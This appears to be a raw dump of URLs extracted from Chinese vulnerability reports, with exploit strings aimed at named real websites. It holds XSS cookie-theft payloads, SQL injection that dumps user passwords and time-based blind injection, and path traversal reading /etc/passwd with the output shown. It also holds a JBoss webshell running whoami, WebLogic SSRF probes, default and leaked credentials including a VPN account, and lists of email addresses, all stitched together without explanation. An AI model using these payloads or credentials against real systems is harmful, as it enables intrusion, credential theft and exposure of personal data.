http://222.222.219.251:2086/doc/page/login.asp http://config.pinyin.sogou.com/api/indexshare/share.php?reurl=/%22%20onerror=%22document.write%28document.cookie%29 http://**.**.**.**/subpage_qy.aspx?typeid=1 http://**.**.**.**:8080/ https://github.com/cj4777/My-emacs.d/blob/fcb08c6bf17f84de004e77c3b20a931c76845ea6/custom.el www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200089&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=F584F8DEE3492219E71DBE4939C12F9 www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200098&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=8E1EBB71226D0322AB7E1ACD2DB7FAAA www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200140&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=AD00126B33B3A61570A14251BBD8B137 www.xyz.cn/api/user/favorite/insureds/get?pageNo=1&loginId=200113&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&pageSize=500&sig=A5B30D4D28406ECDC568DE9C364EB65E www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098051&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=7B7182B2D3D5FC0D44B7777C9A162A8F www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098134&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=45FC12B7B62FA7CAB0E8530C08DC941A www.xyz.cn/api/order/get?sid=API_APP_AND&orderId=160107098008&uid=14749&v=1.0.1&ts=2016-01-12+12%3A30%3A16&sig=3C52B16E7F1D4C2274AC6A7DB0CDC56B www.xyz.cn/api/user/get?loginId=200101&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=2D23DC841F2F5616867024FDF185703E www.xyz.cn/api/user/get?loginId=200091&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=E9C0909F22CBC5E6190A52F91B5DCF1C www.xyz.cn/api/user/get?loginId=200092&sid=API_APP_AND&uid=14749&v=1.0.1&ts=2016-01-11+17%3A30%3A16&sig=02043C74D504604CB64FAE5DDE5D7BC2 http://univ.zte.com.cn/public/DataDown.aspx?EltNo=1103 http://oa.cib-fund.com.cn/ http://oa.cib-fund.com.cn/sysinterface/extpage/cssroot.jsp http://oa.cib-fund.com.cn//ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,123442105,LOGONPASS%20from%20SYSUSER http://**.**.**.** http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../index.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/common.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../chinese_trad/03_support/down.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../index.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/common.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/database/DB_class.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../include/php_script/sql/Mysql_class.php http://**.**.**.**/chinese_trad/03_support/down.php?hDFile=../admin/index.php http://ssp.daoyoudao.com http://**.**.**.** http://**.**.**.**/down.php?f=../../down.php http://**.**.**.**/down.php?f=../../config.php http://**.**.**.**/down.php?f=../../../../../../../etc/passwd nobody:x:99:99:Nobody:/:/sbin/nologin mail:x:8:12:mail:/var/spool/mail:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin mailman:x:32000:962::/usr/local/cpanel/3rdparty/mailman/mailman:/usr/local/cpanel/bin/noshell cpaneleximfilter:x:32003:967::/var/cpanel/userhomes/cpaneleximfilter:/usr/local/cpanel/bin/noshell mysql:x:301:217:MySQL server:/var/lib/mysql:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin dovecot:x:97:97:Dovecot server:/usr/libexec/dovecot:/sbin/nologin root:x:0:0:root:/root:/bin/bash rwdporcom:x:1809755:1809755::/home/rwdporcom:/bin/bash www.kjds.cn http://**.**.**.** http://**.**.**.**/down.php?file=down.php http://**.**.**.**/down.php?file=include/conn.php http://**.**.**.**/ http://**.**.**.**///messager/users.data http://**.**.**.** http://**.**.**.**/down.php?hDFile=../../down.php http://**.**.**.**/down.php?hDFile=../../include/php_script/common.php http://**.**.**.**/ http://**.**.**.**/down.php?hDFile=../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin mysql:x:500:500::/home/mysql:/bin/false mabubu:x:501:524::/Services/Files/upload_files/mabubu:/bin/false sobdeall:x:502:524::/Services/Files/upload_files/sobdeall:/bin/false sisso:x:503:524::/Services/Files/upload_files/sisso:/bin/false mabubu_test:x:504:524::/Services/Files/upload_files_test/mabubu:/bin/false sisso_test:x:505:524::/Services/Files/upload_files_test/sisso:/bin/false kaloo:x:506:524::/Services/Files/upload_files/kaloo:/bin/false teaman:x:507:524::/Services/Files/upload_files/teaman:/bin/false booklife:x:508:524::/Services/Files/programing/booklife/upload_files:/bin/false kaloo_test:x:509:524::/Services/Files/upload_files_test/kaloo:/bin/false ponijohn:x:510:524::/Services/Files/programing/ponijohn/upload_files:/bin/false teaman_test:x:511:524::/Services/Files/programing-test/teaman/upload_files/teaman:/bin/false bestpals:x:512:524::/Services/Files/programing/bestpals/upload_files:/bin/false lilliputiens:x:513:524::/Services/Files/programing/lilliputiens/upload_files:/bin/false soapmaker:x:514:524::/Services/Files/programing/soapmaker/upload_files/soapmaker:/bin/false lilliputiens_test:x:515:524::/Services/Files/programing-test/lilliputiens/upload_files/lilliputiens:/bin/false minihope:x:516:524::/Services/Files/upload_files/minihope:/bin/false ymr:x:517:524::/Services/Files/programing/ymr/upload_files/ymr/:/bin/false ymr_test:x:518:524::/Services/Files/programing-test/ymr/upload_files/ymr:/bin/false sisso-pos:x:519:524::/Services/Files/fonlego-pos/sisso:/bin/false shangyu:x:520:524::/Services/Files/shangyu:/bin/false masmas:x:521:524::/Services/Files/programing/masmas/upload_files/masmas:/bin/false alatech:x:522:524::/Services/Files/programing/alatech/upload_files/alatech:/bin/false minihope-pos:x:523:524::/Services/Files/programing/minihope/upload_files/minihope/pos_stock:/bin/false minihope-mstc:x:524:525::/Services/Files/programing/minihope/upload_files/minihope/minihope-mstc:/bin/false cht:x:525:526::/Services/Files/programing/cht:/bin/false geagle:x:526:524::/Services/Files/programing/geagle/upload_files:/bin/false joederek:x:527:527::/home/joederek:/bin/bash gennies:x:528:524::/Services/Files/upload_files/gennies:/bin/false gennies_wp_maternity:x:529:524::/Services/Files/programing-wp/gennies/maternity:/bin/false gennies_wp_motherhood:x:530:524::/Services/Files/programing-wp/gennies/motherhood:/bin/false gennies_wp_pregnancy:x:531:524::/Services/Files/programing-wp/gennies/pregnancy:/bin/false lakeinsports:x:532:524::/Services/Files/programing/lakeinsports/upload_files/lakeinsports:/bin/false gennies_wp_treasuremap:x:533:533::/Services/Files/programing-wp/gennies/treasuremap:/bin/false cani:x:534:524::/Services/Files/upload_files/cani:/bin/false alatech-en:x:575:524::/Services/Files/upload_files/alatech-en:/bin/false goodhon:x:576:524::/Services/Files/upload_files/goodhon:/bin/false zongtai-www:x:577:524::/Services/Files/programing/zongtai-www:/bin/false gennies_wp_mommy-knowledge:x:578:524::/Services/Files/programing-wp/gennies/mommy-knowledge:/bin/false mombabyfun:x:579:524::/Services/Files/upload_files/mombabyfun:/bin/false mombabyfun-pos:x:580:524::/Services/Files/upload_files/mombabyfun/pos:/bin/false lamalama:x:581:581::/Services/Files/upload_files/lamalama:/bin/false lamalama-return711:x:582:524::/Services/Files/upload_files/lamalama/return711:/bin/false buddybuddy-pos:x:583:583::/Services/Files/programing/buddybuddy/upload_files/buddybuddy/pos:/bin/false buddybuddy:x:584:584::/Services/Files/upload_files/buddybuddy:/bin/false pet_health_food:x:585:585::/Services/Files/programing-wp/buddybuddy/pet_health_food:/bin/false dollbao:x:586:524::/Services/Files/upload_files/dollbao:/bin/false sobdeall-pos:x:587:524::/Services/Files/upload_files/sobdeall/pos:/bin/false http://202.109.103.225:81 http://kfhz.daoyoudao.com http://school.51taoshi.com/study/index/classRoomForXinli.action?search.field02=-1 http://a6.gykghn.com:8080/yyoa/ http://**.**.**.** http://**.**.**.**/phone/sfnr.jsp?id=3741 http://www.kaiyuanhotels.com/web/hotel/searchHotelList.htm?hotelUtil.arrDate=1988-11-06&hotelUtil.city.name=%25E8%2587%25AA%25E8%25B4%25A1%25E5%25B8%2582&hotelUtil.depDate=1951-02-25&hotelUtil.keyword=e http://**.**.**.**/tongji/xininfo.aspx?id=-2147052242 http://**.**.**.**/tongji/xininfo.aspx?id=-2147052242 http://**.**.**.**/tongji/xininfo.aspx?id=-214 http://**.**.**.** http://**.**.**.** http://**.**.**.**/e-go/news_detail.asp?CateID=1&NewsID=29156 http://111.204.39.21:8080/seeyon/index.jsp http://111.204.39.21:8080/seeyon/management/index.jsp http://121.201.7.17:3000/cell-list.html http://sy.ztgame.com/index.php?r=site/login http://www.ec.ccoo.cn/stat2.asp?referer=e&screenwidth=1024&siteid=1&style= http://www.wowozhe.com/jingyans/569.html#comment_sendPart这是主站一篇文章评论处。对xss进行简单过滤如 http://114.242.74.194/login/Login.jsp?logintype=1 http://114.242.74.194/yjh.jsp jdbc:oracle:thin:@127.0.0.1:1521:orcl hh:mm:ss http://114.242.74.194/messager/users.data http://**.**.**.**/PlantInfo/species-name.php?code=524 http://**.**.**.**/chi/taibnet_species_detail.php?name_code=382205 http://114-svc.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL http://hotelwsqq.vip.elong.com/NorthBoundService/V1.1/NorthBoundAPIService.asmx?WSDL http://**.**.**.**/faculty/index.php?piName=rjchein http://**.**.**.**/Articles_shows.php?artid=1371 https://**.**.**.**/ipv4/**.**.**.** http://**.**.**.**/catalog/specialist.php?id=1 https://xx.xxx.xxx.xx9:9043/ibm/console/。 http://dxxx.xxxx.xx/。 jdbc:oracle:thin:@xxx.xx.x.63:1521/xxxxdb,用户名为xxx5,数据库为oracle http://xx.xxx.xxx.xx3/xxx/xxxxxxxx/xxx/xxxxx!xxxxx.action。 http://**.**.**.**:8080/zfcx/rys_admin/admin_xx/admin_info_gr_tj.asp http://oa.beequick.cn http://122.194.12.53:8080/vmain/login.jsp http://122.194.12.53:8080/ServiceAction/com.velcro.base.DataAction?sql=1 http://www.rufengda.com/page/user/register.jsp http://**.**.**.**/introd_show.php?Artctxt_id=1398 http://**.**.**.**/sys/read_attach.php?id=156648 www.huawei.com http://www.huawei.com http://**.**.**.**/listProduct.aspx?SubjectType=1&pageIndex=1&pageSize=20 http://www.del***.com/SubCategory.aspx?SubjectType=2&pageIndex=1&pageSize=20 http://yishi***.com/listProduct.aspx?SubjectType=1&pageIndex=1&pageSize=20 http://yingzhang.izuche.com:8087/BaseDataJson.asmx/GetStorebyDistrictID BaseDataJson.asmx/GetStorebyDistrictID com:8087 http://dsp.gome.com.cn/trp/material/# http://**.**.**.**/page_teacher_o.php?id=17 http://oa.wasu.com.cn:8088/ http://wx.weaver.com.cn/download下载该系统进行代码审计的时候突然想到一个猥琐的思路:能否使用默认密码直连数据库? http://**.**.**.**/index3.php?newsId=2413 http://122.97.132.92:8080/ http://122.97.132.92:8080/jmx-console http://122.97.132.92:8080/invoker/JMXInvokerServlet http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-x-up-to-5-0-7%E8%BF%9B%E4%B8%80%E6%AD%A5%E5%88%A9%E7%94%A8-html.html http://admin.cngames.cn/ http://**.**.**.**/article1.php?lang=1&id=7 http://**.**.**.**/chinese/1_about/teacher_detail.php?ID=2&TID=2 http://103.235.46.83/index.php/site/news_view?id=40 http://**.**.**.**/ctd/news_detail.php?mid=3&news_id=1 http://b2c.huan.tv//index/choose?gid=693&type_id=11 http://**.**.**.**:8080/articles/articles_viewArticle.action?id=4ef56c01-33a5-478b-9f4a-4a067b052628 http://**.**.**.**/web/10636 http://91082030.k388.opensrs.cn/data/data.mdb http://91082030.k388.opensrs.cn/index.asp http://**.**.**.**/Main/Login.asp http://**.**.**.**/ http://121.193.130.83:7001/main.action http://passport.ku6.com/v3-login.htm?redirect=http%3A%2F%2Fv.ku6.com%2Flogin有验证码但是可以绕过,就是抓包之后输入正确一直就会正确,用户名密码均明文传输的: www.729894983@qq.com www.532821866@qq.com www.758655449@qq.com www.513374460@qq.com www.375123670@qq.com www.121585444@qq.com www.sunyong@qq.com www.lishijie220@qq.com www.qinhongge@qq.com www.799342228@qq.com www.654421472@qq.com www.409534427@qq.com www.350948926@qq.com www.350948926@qq.com www.liuhe79.51@qq.com www.nba5757124.cn@qq.com www.735898200@qq.com www.892174208@qq.com http://**.**.**.**/about.asp?id=35 http://**.**.**.**/article_info.asp?id=5593 http://**.**.**.**/newsinfo.asp?id=430 http://**.**.**.**/PhotoView.asp?id=1226 http://**.**.**.**/ShowNews.asp?id=1059 http://**.**.**.**/ShowNews.asp?id=1057 http://**.**.**.**/ShowNews.asp?id=960 http://**.**.**.**/view.asp?id=157 http://**.**.**.**:8080/new/onews.asp?id=797 http://**.**.**.**/newss.asp?id=227 http://**.**.**.**/mucc/about.asp?id=60 http://**.**.**.**/Article.asp?id=2923 http://**.**.**.**/show.asp?id=356 http://**.**.**.**/tpshow.asp?id=82 http://**.**.**.**/mucc/shownews.asp?id=1395 http://**.**.**.**/mucc/tupianshow.asp?id=190 http://**.**.**.**/news_show.asp?id=1687 http://**.**.**.**/Show.asp?id=733 http://**.**.**.**/news_content.asp?id=153 http://**.**.**.**/news_content.asp?id=152 http://**.**.**.**/list_news.asp?id=752&sort_id=761清涧县拆家坪镇人民政府 http://**.**.**.**/showxw.asp?id=300 http://**.**.**.**/nzcms_list_news.asp?id=671&sort_id=657 http://**.**.**.**/aboutus.asp?id=23 http://**.**.**.**/user/index.asp?id=4706 http://**.**.**.**/user/index.asp?id=4708 http://**.**.**.**/jgjj.asp?id=398 http://**.**.**.**/ShowNews.asp?id=98 http://**.**.**.**/news_zw.asp?id=14465&classid=14 http://**.**.**.**/aDetail.asp?ID=949 http://**.**.**.**/nzcms_list_news.asp?id=674&sort_id=658 http://**.**.**.**/Detail.asp?id=7891 http://**.**.**.**/News_Blank.asp?ID=2330 http://**.**.**.**/show_news.asp?id=5827 http://**.**.**.**/Html/Links.Asp?Id=25 http://**.**.**.**/type.asp?ID=1 http://**.**.**.**/cjcyxcs.asp?id=78 http://**.**.**.**/nzcms_list_news.asp?id=668&sort_id=657 http://**.**.**.**/newsInfo.asp?id=827&cid=52 http://**.**.**.**/detail.asp?id=15870 http://**.**.**.**/LstNewsInfo.asp?tt=14&ss=15&Id=1029 http://**.**.**.**/LstNewsInfo.asp?TT=9&Id=1126 http://**.**.**.**/LstNewsInfo.asp?tt=8&ss=8&Id=1198 http://**.**.**.**/djinfo.asp?id=299 http://**.**.**.**/yb.asp?id=82&artid=25059 http://**.**.**.**/news/new.asp?id=1743 http://**.**.**.**/show.asp?id=849 http://**.**.**.**/list.asp?id=317 http://**.**.**.**/list_news.asp?sort_id=791&id=784 http://**.**.**.**/list_news.asp?sort_id=793&id=784 http://**.**.**.**/list_news.asp?sort_id=785&id=784 http://**.**.**.**/list_news.asp?sort_id=787&id=784 http://**.**.**.**/nzcms_list_news.asp?id=674&sort_id=658 http://**.**.**.**/nzcms_list_news.asp?id=676&sort_id=658 http://**.**.**.**/nzcms_list_news.asp?id=673&sort_id=658 http://**.**.**.**/company.asp?id=53 http://**.**.**.**/show.asp?Id=673 http://**.**.**.**/show.asp?id=104 http://**.**.**.**/show.asp?id=3784 http://**.**.**.**/article_show.asp?id=9 http://**.**.**.**/NewsView.asp?id=1382 http://**.**.**.**/Users/GBook/ReadBook.asp?id=35 http://**.**.**.**/qa.asp?id=1 http://**.**.**.**/showtzgg.asp?id=370 http://**.**.**.**/newsShow.Asp?id=1989 http://**.**.**.**/list_news.asp?id=797&sort_id=672 http://**.**.**.**/newslist.asp?id=41 http://**.**.**.**/detail.asp?id=1774 http://**.**.**.**/index_onews.asp?id=2785 http://**.**.**.**/index_onews.asp?id=2717 http://**.**.**.**/page.asp?id=3 http://**.**.**.**/news.asp?id=303&bh=1038 http://**.**.**.**/new_view.asp?id=447 http://**.**.**.**/dwmy/index02_1.asp?id=75 http://**.**.**.**/aDetail.asp?ID=959 http://**.**.**.**/aDetail.asp?ID=949 http://**.**.**.**/disqa.asp?id=2 http://**.**.**.**/infolist.asp?id=1280&big=14&small=67 http://**.**.**.**/show.asp?id=821 http://**.**.**.**/ajax/docshow.asp?id=2140 http://**.**.**.**/FriendSite/FriendSiteUrl.asp?ID=18 http://**.**.**.**/Html/Links.Asp?Id=25 http://**.**.**.**/onews.asp?id=947 http://**.**.**.**/show.asp?id=5372&partid=7&smallid=95 http://**.**.**.**/readnews.asp?id=759 http://**.**.**.**/nzcms_list_news.asp?id=878&sort_id=877 http://**.**.**.**/news_zw.asp?id=14465&classid=14 http://**.**.**.**/news_zw.asp?id=14509&classid=97 http://**.**.**.**/text.asp?id=83082 http://**.**.**.**/tzgg.asp?id=1140 http://**.**.**.**/details.asp?id=137 http://**.**.**.**/showmsg.asp?id=1883 http://**.**.**.**/showmsg.asp?id=1893 http://**.**.**.**/showmsg.asp?id=1877 http://**.**.**.**/pic_news.asp?id=107 http://**.**.**.**/news_show.asp?id=2404 http://**.**.**.**/news_show.asp?id=2517 http://**.**.**.**/Manage/ManageShow.asp?ID=432 http://**.**.**.**/Manage/ManageShow.asp?ID=431 http://**.**.**.**/News/NewsShow.asp?ID=309 http://**.**.**.**/list/view.asp?id=14615 http://**.**.**.**/listvideo.asp?cid=29 http://**.**.**.**/show.asp?id=93 http://**.**.**.**/show.asp?id=907 http://**.**.**.**/nzcms_list_news.asp?id=665&sort_id=656 http://**.**.**.**/display.asp?id=656 http://**.**.**.**/wenzhang_xx.asp?TypeNumber=00070004&ID=25693 http://**.**.**.**/nzcms_list_news.asp?id=681&sort_id=672 http://**.**.**.**/nzcms_list_news.asp?id=681&sort_id=656 http://**.**.**.**/xxlr1.asp?ID=5171 http://**.**.**.**/nzcms_list_news.asp?id=590&sort_id=586 http://**.**.**.**/article_index.asp?id=389&root=34 http://**.**.**.**/new.asp?id=428&aid=426 http://**.**.**.**/Newss.asp?f=&id=4681 http://**.**.**.**/Newss.asp?f=&id=4540 http://**.**.**.**/showxw.asp?id=300 http://**.**.**.**/showxw.asp?id=1061 http://**.**.**.**/showxw.asp?id=2638 http://**.**.**.**/showxw.asp?id=1593 http://**.**.**.**/showxw.asp?id=3298 http://**.**.**.**/showxw.asp?id=3297 http://**.**.**.**/nzcms_list_news.asp?id=14&sort_id=13 http://**.**.**.**/ShowNews.asp?id=98 http://**.**.**.**/Detail.asp?id=7891 http://**.**.**.**/News_Blank.asp?ID=2330 http://**.**.**.**/show_news.asp?id=5827 http://**.**.**.**/alistclass.asp?id=1 http://**.**.**.**/zfwj/detail.asp?ID=2185 http://**.**.**.**/news_show.asp?id=1687 http://**.**.**.**/zltj.php?act=list&cat_id=33 newzeroblog:123456 admin:admin123 http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83 http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83%27;if%20len%28user%29=5%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83%27;if%20ascii%28substring%28user,1,1%29%29=105%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/ContentDetail.aspx?mid=NewsManage&NewsID=83%27;if%20ascii%28substring%28user,2,1%29%29=115%20waitfor%20delay%20%270:0:3%27-- http://**.**.**.**/frontInformAction.do?method=queryInformList&pdid=123 http://**.**.**.**/admin.php http://gamemanager.uqee.com/ http://61.136.96.16:7000/ www.sqgf.com http://www.sqgf.com/carService/4s/4sxszx.jsp?pageNo=2&pinpai=1 http://www.sqgf.com/carService/tengDi/gzxw.jsp?newstypes=1 http://www.sqgf.com/huantu/4s_1sqtp/4s.jsp?company=1 http://www.sqgf.com/taxiManager/businessTaxi/gmycx.jsp?cartype=1 http://www.sqgf.com/carService/cyjlb_jchg.jsp?com=1 http://www.sqgf.com/carService/ppgs.jsp?comID=1 http://www.thinkworldshop.com.cn/ http://wooyun.org/bugs/wooyun-2016-0168170 http://oa.tianya.cn/ http://**.**.**.**:9002/jnld/ http://**.**.**.**/consult/consult.aspx?Action=2&radioType=0401 http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-x-up-to-5-0-7%E8%BF%9B%E4%B8%80%E6%AD%A5%E5%88%A9%E7%94%A8-html.html http://122.97.132.98:7001 http://122.97.132.98:7001/1/ http://122.97.132.98:7001/a/ http://122.97.132.98:7001/aa/ http://122.97.132.98:7001/atone/ http://122.97.132.98:7001/atone/ http://122.97.132.98:7001/cdn/ http://122.97.132.98:7001/cK/foot.jsp密码test http://open.egret.com/ http://shop.zymk.cn/index.php/category/index/?page=4&order=shop_price http://**.**.**.**/ODgzZ http://**.**.**.**/ODgzZ http://mail.**.**.**.**/ http://27.115.81.173/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://27.115.81.172/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.99:7011&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search https://ipcrs.pbccrc.org.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://61.129.93.48/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://61.129.93.41/uddiexplorer/SearchPublicRegistries.jsp?operator=http://21.10.6.12:7001&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search http://www.einfo.net.cn/whut2/browser/signup_step2.jsp?cid=acunetix.txt&cid2=1&cidname=%C9%ED%B7%DD%D6%A4&enter_year=&learn_level=q&majorName=&major_id=&recruit_id=&season=&signupType=&sitename=&site_id= http://**.**.**.**/Contents/news/module/20151117105052*/S_i/3/3.xhtml https://**.**.**.**:8080/dubbo-admin/ https://**.**.**.**:8080/ http://**.**.**.**/ http://**.**.**.**.mo/ http://**.**.**.**.mo/c_news/radio_news.php http://**.**.**.**/qylp.asp?classID=266 http://ework.org.hc360.com/ http://nps.hc360.com/nps/innovation/my.htm http://**.**.**.**:8080/alumnioss/admin/login!doLogin.action http://**.**.**.**/ http://**.**.**.**/bea_wls_internal/360.jsp http://corp.b2b.cn/content/Content/index/id/533 http://corp.b2b.cn/content/Content/index?id=533 http://**.**.**.**/connections/productlist.aspx?c=120517&b=&p=&sort=new&page=1&_=1452495106789&b=&c=1&p=&page=1&sort=new&_=1452495106789 http://**.**.**.** https://vbank.jsbchina.cn http://kfhz.daoyoudao.com http://auman.360che.com/viewthread.php?tid=397430&page=3 http://shop.zymk.cn/index.php/home/search/index?keyword=抱枕&order=click_count http://passport.tuniu.com http://**.**.**.**/admin/login.php http://**.**.**.**/bugs/wooyun-2014-085980 http://**.**.**.**/config/const.system.php http://ibst.usst.edu.cn/news.asp?id=66 http://carbon.usst.edu.cn/team.asp?id=86 http://wenku.baidu.com/view/dcabc173c8d376eeafaa3129.html?from=search泄露了中国铁塔股份有限公司FSU管理VPN,类型:L2TP,账号:ttcw2015 IP:101.227.248.109.拨号登录后,根据所获取的IP段,对全网段进行80端口登录,发现有大量使用默认密码admin的FSU设备,登录后可以做任意操作。有部分FSU记录了基站的GPS定点,甚至有远程开锁功能。 http://oa.fun.tv/seeyon/main.do http://120.131.2.30/transformer_jinshan/admin/index/ http://**.**.**.**/bugs/wooyun-2016-0168680 index.php/user/login http://**.**.**.**/Article_List.aspx?ClassID=1 http://**.**.**.**/soft/35768.htm http://trihope.w322.bizcn.com/ly_detail.asp?ly_id=751 http://re.ip66.com/admin.php site:http://www.bkjx1.sdu.edu.cn/ filetype:xls site:http://www.bkjx1.sdu.edu.cn/ filetype:xls site:http://www.*.sdu.edu.cn/ filetype:xls http://www.bkjx1.sdu.edu.cn/userfiles/ http://www.bkjx1.sdu.edu.cn/uploadfiles/ filetype:xls http://pan.baidu.com/s/1o721KF4 http://www.hp1997.com/Control/cityInfo.ashx?method=city&rid=278 http://**.**.**.**/install/c.asp http://**.**.**.**:8090/存在“Java http://**.**.**.**:7001/ http://**.**.**.**是东北师范大学文学院 http://**.**.**.**/index_show.php?typeid=41&m_id=10&page=1这个链接中m_id和page做了比较好的过滤,但是没有对typeid作过滤。 http://**.**.**.**/index_show.php?typeid=41‘&m_id=10&page=1 http://**.**.**.**:7001/defaultroot/desktop.jsp http://555caipiao.com/ctzq/?betTypeId=38&issueNum=2016009 http://m.ubox.cn/ http://**.**.**.**/index.php?m=fdirectory&a=search http://cr.kuwo.cn/.svn/entries http://60.28.210.99:4000/ http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601131046651212 http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601130158377422 http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601130188934808 http://www.lemall.com/zhongchou/orderdetails.html?orderid=201601130279269456 http://scm.beequick.cn/ http://uc.263.net/ http://uc.263.net/ma/web/usc/action/bill/list/recharge.do?sid=uid_pc_100000000405&_t=1452739998706 cn:9200存在admin/zabbix默认账户及口令。 http://iyouxi.baidu.com/youxi_rest.xhtml?sort=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E http://iyouxi.baidu.com/login_game_by_zone.xhtml?to=enterV2&id=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&pid=11300600091_972909 http://live.quanshi.com/server-info http://live.quanshi.com/server-status http://219.143.252.170/ http://www.nyist.net/ http://222.139.215.209/ http://222.139.215.209/t9/core/funcs/netdisk/index.jsp?seqId=0&filePath=D:/& display:none就可以了 http://222.139.215.209:8080/phpMyAdmin/ http://222.139.215.209:8080/xiaowu http://**.**.**.**/e-go/heart_detail.asp?HidDID=21 https://github.com/bestvivi/mailtransport/blob/a2108e0b75096c457e8c1853f7c79657bcaae01b/transportmail.py http://219.143.252.170/seeyon/index.jsp http://**.**.**.**/News_info.php?id=24 https://111.204.123.119/admin/ http://www.jia.com/citylist/ask_city_list.php?callback=jQuery172026691810227930546_1452738150949&provinces=1*&_=1452738167755 http://qiantu.xdf.cn/wcm/app/login.jsp http://**.**.**.**/affairDetail.jsp?affairID=9d0c134f018eb171088250a148c050d8 http://**.**.**.**/educationDetail.jsp?educationID=f6303cb5a4b91420ca291c0e2c34b539 http://**.**.**.**/login.portal http://**.**.**.**/getBackPassword.portal http://**.**.**.**:8000/ http://103.255.94.185:8080/ui/#/apps/%2Fpassport/configuration http://www.yijifen.com/dologin.do http://219.141.242.77:7005/Alianture_frame/login.do http://219.141.242.77:7005/jbossass/jbossass.jsp http://219.141.242.77:7005/jbossass/jbossass.jsp?ppp=whoami http://www.dcdisplay.com/ 